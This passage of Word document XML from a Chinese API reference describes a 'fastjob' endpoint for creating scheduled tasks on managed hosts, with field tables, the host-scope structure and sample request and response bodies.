          <w:p w14:paraId="46B6C455" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务类型 1. 系统内置任务, 2, 用户添加任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="109568C7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D9BA127" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="068259DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51BE6780" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6388DAB2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EE15483" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskParams</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3574049A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TaskParam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EE147B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C6E24A6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="143AC6BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE725F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A83E63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40D37661" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1880AF20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BCB28A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE37A30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启定时执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B713325" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Realm结构说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="1435"/>
        <w:gridCol w:w="7759"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="449D016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0C3C5FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="418F79EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3844DB47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07A29B9C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="564B47EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21130679" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71EC0C59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围，0:全部主机,type为0时，agents和groups不传; 1:主机范围，如果type=1, 则agents必传; 2:业务组范围，如果type=2,则groups必传 不传时为0全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56A810D6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04386B18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03712CC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27CF4C1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56A6A35F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="089AB7D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328B5B45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;Integer&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27392755" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51D655E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TaskParam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="739"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6548933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6A9F8A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61B3E212" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CF4C579" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5ABDAF20" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4574A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F9947A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="365E4D06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3ADA5213" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F4578F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCFE93B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C3365EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="648B6AFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53941558" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303BBF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>testxxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>description"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> xxx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"realm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>realmName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"全部主机"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"0478ee5024763edc6d3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskParams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EDB41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793E356F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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b568b67657c1b743cf33b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>createdTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-02 21:05:11"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6294E805" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
